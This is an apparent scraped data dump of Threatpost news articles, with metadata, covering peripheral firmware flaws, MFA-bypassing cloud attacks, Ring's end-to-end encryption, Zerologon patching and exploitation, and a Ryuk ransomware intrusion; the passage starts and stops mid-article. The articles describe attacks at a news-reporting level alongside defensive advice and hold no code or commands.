peripheral devices remains a highly overlooked aspect of cybersecurity, and provides multiple pathways for malicious actors to compromise laptops and servers.\n\n\u201cOnce firmware on any of these components is infected, the malware stays undetected by any software security controls,\u201d Michael said. \u201cDespite previous in-the-wild attacks, peripheral manufacturers have been slow to adopt the practice of signing firmware, leaving millions of Windows and Linux systems at risk of firmware attacks that can exfiltrate data, disrupt operations and deliver ransomware.\u201d\n\n**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives._**\n", "cvss3": {}, "published": "2020-02-18T11:00:08", "type": "threatpost", "title": "Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-18T11:00:08", "id": "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "href": "https://threatpost.com/lenovo-hp-dell-peripherals-unpatched-firmware/152936/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-15T21:55:38", "description": "The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.\n\nAccording to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been \u201cseveral recent successful cyberattacks\u201d focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.\n\n\u201cThese types of attacks frequently occurred when victim organizations\u2019 employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,\u201d the alert outlined. \u201cDespite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nFor instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.\n\n\u201cAlthough their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it\u2014leaving the organization\u2019s network vulnerable [to brute-forcing],\u201d CISA explained.\n\nThe agency also noted that phishing and possibly a \u201cpass-the-cookie\u201d attack have been the primary attack vectors for the cloud attacks.\n\n## **Phishing and Bypassing MFA**\n\nOn the phishing front, targets are being sent emails containing malicious links, which purport to take users to a \u201csecure message.\u201d Other emails masquerade as alerts for legitimate file hosting services. In both cases, the links take targets to a phishing page, where they\u2019re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.\n\n\u201cCISA observed the actors\u2019 logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),\u201d according to the alert. \u201cThe actors then sent emails from the user\u2019s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization\u2019s file-hosting service.\u201d\n\nMeanwhile, attackers have been able to bypass MFA using a [\u201cpass-the-cookie\u201d attack](<https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/>). Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn\u2019t prompted for an MFA check again.\n\nThus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user\u2019s system, after which it\u2019s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.\n\n\u201cIt is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,\u201d said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. \u201cIf you think you\u2019re far less likely to be hacked because of MFA (and that isn\u2019t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you\u2019re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn\u2019t impart some special, magical defense that no hacker can penetrate. Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.\u201d\n\n## **Exploiting Forwarding Rules**\n\nCISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.\n\nForwarding rules allow users to send work emails to their personal email accounts \u2013 a useful feature for remote workers.\n\nCISA said that it has observed threat actors modifying an existing email rule on a user\u2019s account to redirect the emails to attacker-controlled accounts.\n\n\u201cThreat actors also modified existing rules to search users\u2019 email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors\u2019 account,\u201d according to the agency. \u201cThe threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users\u2019 RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.\u201d\n\n## **Cloud Security**\n\nCloud adoption, spurred by pandemic work realities, will only [accelerate in the year ahead](<https://threatpost.com/2021-cybersecurity-trends/162629/>) with software-as-a-service, cloud-hosted processes and storage driving the charge. A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.\n\nBudget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.\n\n\u201c[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,\u201d said David Smith, distinguished VP Analyst at Gartner.\n\nAccordingly, cloud applications and environments are increasingly[ in the sights of attackers](<https://threatpost.com/cloud-king-software-security-trends-2021/162442/>). In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to [compromise the cloud](<https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>).\n\n\u201cMalicious cyber-actors are abusing trust in federated authentication environments to access protected data,\u201d the advisory read. \u201cThe exploitation occurs after the actors have gained initial access to a victim\u2019s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n\n_ _\n", "cvss3": {}, "published": "2021-01-14T16:45:04", "type": "threatpost", "title": "Cloud Attacks Are Bypassing MFA, Feds Warn", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T16:45:04", "id": "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "href": "https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:15", "description": "Smart doorbell maker Ring is giving cybersecurity critics less to gripe about with the introduction of end-to-end encryption to many of its models. Ring products, which have been a juggernaut success with consumers, have faced a litany of harsh criticism from cybersecurity experts for what they say is a [lack of attention to basic digital security](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>).\n\nAfter a much anticipated response to critics, Ring this week rolled out end-to-end encryption for many of its home security camera products. End-to-end encryption, according to Ring, can be added to less than 50 percent of its in-use products. Older model smart-doorbell products, such as its first and second-generation video doorbells, cannot be upgraded with the added protection.\n\nThe move was anticipated, but initiated later than planned. \n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nTechnical specifics by the Amazon-owned company Ring [were made available on Wednesday](<https://assets.ctfassets.net/a3peezndovsu/5jmqFoKyaCXpL2qBG46Zqn/72d138d896e7460c5bdae07992ad491e/Ring_Encryption_Whitepaper.pdf>) (PDF) as part of a technical preview of the new security measures. Ring\u2019s end-to-end encryption plans was first announced in September and originally slated to be introduced by the end of 2020.\n\nThe feature\u2014which will be optional and free for customers\u2014will allow only the device authorized and enrolled with the associated Ring account to accept and access the live Ring video stream. If third parties want to view a recording or stream on another device, they will need access to an encryption key stored on the mobile device authorized to view the stream.\n\nIt\u2019s unclear how [law enforcements\u2019 access to Ring doorbell feeds](<https://threatpost.com/rings-police-partnerships-racial-bias/157140/>) might be impacted \u2013 if at all.\n\n## **Clamoring Critics**\n\nThe company has faced years of criticism for flaws in the system that opened video and data collected by the system to be stolen by threat actors. Still other critics blasted Ring for what they said were the company\u2019s own dodgy data-collection practices.\n\nLast year, Amazon [patched a vulnerability](<https://threatpost.com/senators-amazon-ring-privacy-policies/150533/>) in the Ring smart doorbell that could have allowed attackers to access the owner\u2019s Wi-Fi network credentials and potentially reconfigure the device to launch an attack on the home network.\n\nA couple of days later, five U.S. Senators demanded in a letter to Amazon CEO Jeff Bezos that Amazon disclose how it\u2019s securing Ring home-security device footage\u2013and who is allowed to access that footage.\n\nLast October, Ring raised privacy hackles again when [it unveiled](<https://threatpost.com/ring-drone-privacy/159562/>) the new Always Home Cam, a smart home security camera drone that flies around homes taking security footage of people inside their own homes. Due to Amazon\u2019s already questionable data-collection practices, privacy advocates worried that the footage could fall into the wrong hands.\n\n## **Front Door Mitigations **\n\nOn Wednesday, Ring outlined how it would specifically address those concerns. It said Ring will add an extra layer of security and privacy in addition to Ring\u2019s existing encryption, which by default encrypts videos when they are uploaded to the cloud and stored on Ring\u2019s servers, the company said.\n\n\u201cWith End-to-End Encryption, customer videos are further secured with an additional lock, which can only be unlocked by a key that is stored on the customer\u2019s enrolled mobile device, designed so that only the customer can decrypt and view recordings on their enrolled device,\u201d according to a [Ring blog post](<https://blog.ring.com/2021/01/13/ring-launches-video-end-to-end-encryption/>) about the rollout.\n\nRing said the service gives users \u201ccontrol and additional choices for encrypting and decrypting their videos and is designed so that no unauthorized third party can access user video content,\u201d according to a [whitepaper](<https://threatpost.com/hacks-android-windows-zero-day/163007/>) Ring posted online about the service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/14080350/Ring_End_to_End_Encryption.jpg>)\n\nRing Diagram of End-to-End Encryption Overview\n\nVideos encrypted when the feature is turned off will still be encrypted if the user decides to disable end-to-end encryption, according to the whitepaper, which also provides step-by-step instructions about how the feature works as well as specific details about what type of encryption the company is using.\n\nEnd-to-end encryption certainly adds a layer of privacy that many customers and privacy advocates have long wanted from Ring, which since its inception has constantly pushed the boundaries of how much privacy people are willing to give up for home security protection.\n\n## **Following Zoom\u2019s Lead**\n\nThe move to add end-to-end encryption to Ring is similar to one that online videoconferencing service [Zoom took last year](<https://threatpost.com/zoom-end-to-end-encryption-paying-users/156286/>) to encrypt video streams amid privacy concerns and numerous security breaches of the service, such as [Zoom bombing](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) and [zero-day vulnerabilities](<https://threatpost.com/alleged-zoom-zero-days-for-windows-macos-for-sale-report/154846/>), among others. Zoom, however, made the feature available to only paid users of the service.\n\nWhile Ring\u2019s new feature has privacy and security benefits, it also will disrupt some existing features of the service, such as accessing Ring video through Alexa, and Echo Show or Fire TV device, or sharing with other cameras.\n\nThe encryption also may throw a wrench in [controversial plans](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>) to use Ring\u2019s Neighbors app to share data footage from Ring devices with law enforcement, such as what\u2019s happening in [a program being tested by police](<https://threatpost.com/police-livestream-ring-camera-mississippi/160936/>) in Mississippi in which they can livestream video from Ring cameras installed at private homes and businesses. When launched, the program sounded an alarm bell with privacy advocates like the Electronic Frontier Foundation, which [called the launch](<https://www.eff.org/deeplinks/2020/11/police-will-pilot-program-live-stream-amazon-ring-cameras>) of the program its \u201cworst fears\u201d being \u201cconfirmed.\u201d\n\nHowever, as the feature is optional and Ring users can choose to share encryption keys with third parties, it will still be possible to both stream video to other devices and share video streams with law enforcement if the owner of the device so chooses.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-14T13:28:22", "type": "threatpost", "title": "Ring Adds End-to-End Encryption to Quell Security Uproar", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T13:28:22", "id": "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "href": "https://threatpost.com/ring-adds-end-to-end-encryption-to-quell-security-uproar/163042/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:29", "description": "Microsoft is taking matters into its own hands when it comes to companies that haven\u2019t yet updated their systems to address the critical Zerologon flaw. The tech giant will soon by default block vulnerable connections on devices that could be used to exploit the flaw.\n\nStarting Feb. 9, Microsoft said it will enable domain controller \u201cenforcement mode\u201d by default, a measure that would help mitigate the threat.\n\nMicrosoft Active Directory domain controllers are at the heart of the Zerologon vulnerability. Domain controllers respond to authentication requests and verify users on computer networks. [A successful exploit of the flaw](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) allows unauthenticated attackers with network access to domain controllers to completely compromise all Active Directory identity services.\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\nDomain Controller enforcement mode \u201cwill block vulnerable connections from non-compliant devices,\u201d said Aanchal Gupta, VP of engineering with Microsoft [in a Thursday post](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>). \u201cDC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.\u201d\n\nSecure RPC is an authentication method that authenticates both the host and the user who is making a request for a service.\n\nThis new implementation is an attempt to block cybercriminals from gaining network access to domain controllers, which they can utilize to exploit the Zerologon privilege-escalation glitch ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The flaw, with a critical-severity CVSS score of 10 out of 10, was first addressed in [Microsoft\u2019s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). But [starting in September](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), at least four public Proof-of-Concept (PoC) exploits for the flaw were released on** **[Github,](<https://github.com/dirkjanm/CVE-2020-1472>) along with technical details of the vulnerability.\n\nThe enforcement mode \u201cis a welcome move because it is such a potentially damaging vulnerability that could be used to hijack full Domain Admin privileges \u2013 the \u2018Crown Jewels\u2019 of any network providing an attacker with God-mode for the Windows server network,\u201d Mark Kedgley, CTO at New Net Technologies (NNT), told Threatpost. \u201cBy defaulting this setting it is clear that it is seen as too dangerous to leave open. [The] message to everyone is to patch often and regularly and ensure your secure configuration build standard is up to date with the latest [Center for Internet Security] or [Security Technical Implementation Guide] recommendations.\u201d\n\nZerologon has grown more serious over the past few months as several threat actors and advanced persistent threat (APT) groups closed in on the flaw, including cybercriminals like the [China-backed APT Cicada](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) and [the MERCURY APT group](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>).\n\n\u201cReported attacks began occurring within just two weeks of the vulnerability being disclosed,\u201d Ivan Righi, cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cAPT10 (aka Cicada, Stone Panda, and Cloud Hoppe) was also observed leveraging Zerologon to target Japanese companies in November 2020.\u201d\n\nThe U.S. government has also stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nGupta for his part said that organizations can take four steps to avoid the serious flaw: Updating their domain controllers to an update released Aug. 11, 2020, or later; find which devices are making vulnerable connections (via monitoring log events); addressing those non-compliant devices making the vulnerable connections; and enabling domain controller enforcement.\n\n\u201cConsidering the severity of the vulnerability, it is advised that all Domain Controllers be updated with the latest security patch as soon as possible,\u201d Righi told Threatpost.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "cvss3": {}, "published": "2021-01-15T21:47:20", "type": "threatpost", "title": "Microsoft Implements Windows Zerologon Flaw 'Enforcement Mode'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-15T21:47:20", "id": "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "href": "https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T21:47:09", "description": "A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.\n\nThat\u2019s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday report. Microsoft announced last week that it had started observing active exploitation in the wild: \u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nNow, the volume of those attacks is ramping up, according to Cisco Talos, and the stakes are high. Netlogon, available on Windows domain controllers, is used for various tasks related to user- and machine-authentication. A successful exploit allows an unauthenticated attacker with network access to a domain controller (DC) to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis flaw allows attackers to impersonate any computer, including the domain controller itself and gain access to domain admin credentials,\u201d added Cisco Talos, [in a writeup](<https://blog.talosintelligence.com/2020/09/netlogon-rises.html#more>) on Monday. \u201cThe vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol which \u2014 among other things \u2014 can be used to update computer passwords by forging an authentication token for specific Netlogon functionality.\u201d\n\nFour proof-of-concept (PoC) exploits [were recently released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale. That prompted the U.S. [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF) issued a dire warning that the \u201cvulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.\u201d It also mandated that federal agencies patch their Windows Servers against Zerologon, in a rare emergency directive issued by the Secretary of Homeland Security.\n\n## **Two-Phased Patching**\n\nMicrosoft\u2019s patch process for Zerologon is a phased, two-part rollout.\n\nThe initial patch for the vulnerability was issued as part of the computing giant\u2019s [August 11 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>), which addresses the security issue in Active Directory domains and trusts, as well as Windows devices.\n\nHowever, to fully mitigate the security issue for third-party devices, users will need to not only update their domain controllers, but also enable \u201cenforcement mode.\u201d They should also monitor event logs to find out which devices are making vulnerable connections and address non-compliant devices, according to Microsoft.\n\n\u201cStarting February 2021, enforcement mode will be enabled on all Windows Domain Controllers and will block vulnerable connections from non-compliant devices,\u201d it said. \u201cAt that time, you will not be able to disable enforcement mode.\u201d\n\nLast week, both Samba and 0patch [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472, to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows, in the case of the latter.\n\nSamba, a third-party file-sharing utility for swapping materials between Linux and Windows systems, relies on the Netlogon protocol, and thus suffers from the vulnerability. The bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC),\n", "cvss3": {}, "published": "2020-09-29T18:13:47", "type": "threatpost", "title": "Zerologon Attacks Against Microsoft DCs Snowball in a Week", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T18:13:47", "id": "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "href": "https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T22:48:56", "description": "Threat attackers continue to exploit the Microsoft Zerologon vulnerability, a situation that\u2019s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update Windows systems with a patch Microsoft released in August to mitigate attacks.\n\nDespite patching awareness efforts, Microsoft said it is still receiving \u201ca small number of reports from customers and others\u201d about active exploits of the bug tracked as [CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>), or Zerologon, according to a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) by Aanchal Gupta, vice president of engineering for MSRC, on Thursday.\n\nThe zero-day elevation-of-privilege vulnerability\u2014rated as critical and first disclosed and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>)\u2013could allow an attacker to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services. \n[](<https://threatpost.com/newsletter-sign/>) \nThe bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). The flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\nGupta urged organizations to deploy the Aug.11 patch or later release to every domain controller as the first in a four-step process to fix the vulnerability. Then administrators should monitor event logs to find which devices are making vulnerable connections; address identified non-compliant devices; and enable enforcement to address the bug in the overall environment, he said.\n\n\u201cOnce fully deployed, Active Directory domain controller and trust accounts will be protected alongside Windows domain-joined machine accounts,\u201d he said.\n\nIn addition to Microsoft\u2019s patches, last month both Samba and 0patch also [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472 to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows.\n\nMicrosoft\u2019s latest advisory was enough for the Department of Homeland Security\u2019s (DHS\u2019s) Cybersecurity and Infrastructure Security Agency (CISA) to step in and issue a [statement](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>) of its own Thursday warning organizations about continued exploit of the bug.\n\nGiven the severity of the vulnerability, the government has been nearly as active as Microsoft in urging people to update their systems. Interest from the feds likely has intensified since Microsoft\u2019s [warning earlier this month](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that an Iranian nation-state advanced persistent threat (APT) actor that Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) is now actively exploiting Zerologon.\n\n\u201cCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes,\u201d according to the CISA alert.\n\nThe agency even has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>) to detect unpatched Microsoft domain controllers to help administers install the update. \u201cIf there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services,\u201d the CISA warned.\n\nZerologon has been a consistent thorn in Microsoft\u2019s side since its discovery, a scenario that has escalated since early September thanks largely to the publication of [four proof-of-concept exploits](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the flaw on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) Soon after the exploits were published, Cisco Talos researchers [warned of a spike](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) in exploitation attempts against Zerologon.\n\nThe U.S. government first stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\n#### **Hackers Put Bullseye on Healthcare: ****[On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-30T11:41:36", "type": "threatpost", "title": "Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-30T11:41:36", "id": "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "href": "https://threatpost.com/microsoft-warns-zerologon-bug/160769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-19T16:58:13", "description": "The Ryuk threat actors have struck again, moving from sending a phishing email to complete encryption across the victim\u2019s network in just five hours.\n\nThat breakneck speed is partially the result of the gang using the Zerologon privilege-escalation bug (CVE-2020-1472), less than two hours after the initial phish, researchers said.\n\nThe Zerologon vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. It was patched in August, but many organizations remain vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this particular attack, after the attackers elevated their privileges using Zerologon, they used a variety of commodity tools like Cobalt Strike, AdFind, WMI and PowerShell to accomplish their objective, according to the analysis from researchers at the DFIR Report, [issued Sunday](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>).\n\n## **The Attack Begins**\n\nThe attack started with a phishing email containing a version of the Bazar loader, researchers said. From there, the attackers performed basic mapping of the domain, using built-in Windows utilities such as Nltest. However, they needed to escalate their privileges to do any real damage, so they exploited the recently disclosed Zerologon vulnerability, researchers said.\n\nHaving gained elevated admin privileges, the cybercriminals were able to reset the machine password of the primary domain controller, according to the analysis.\n\nThen, they moved laterally to the secondary domain controller, carrying out more domain discovery via Net and the PowerShell Active Directory module.\n\n\u201cFrom there, the threat actors appeared to use the default named pipe privilege escalation module on the server,\u201d researchers said. \u201cAt this point, the threat actors used [Remote Desktop Protocol] RDP to connect from the secondary domain controller to the first domain controller, using the built-in administrator account.\u201d\n\n## **Cobalt Strike**\n\nLateral movement was initiated via Server Message Block (SMB) and Windows Management Instrumentation (WMI) executions of Cobalt Strike beacons, researchers said. SMB is a networking file-share protocol included in Windows 10 that provides the ability to read and write files to network devices. WMI meanwhile enables management of data and operations on Windows-based operating systems.\n\nCobalt Strike belongs to a group of dual-use tools that are typically leveraged for both exploitation and post-exploitation tasks. Other examples in circulation include PowerShell Empire, Powersploit and Metasploit, according to [recent findings](<https://threatpost.com/fileless-malware-critical-ioc-threats-2020/159422/>) from Cisco.\n\n\u201cFrom memory analysis, we were also able to conclude the actors were using a trial version of Cobalt Strike with the EICAR string present in the network configuration for the beacon. Both portable executable and DLL beacons were used,\u201d researchers added.\n\nOnce on the main domain controller, another Cobalt Strike beacon was dropped and executed.\n\nThe analysis of the attack revealed that after about four hours 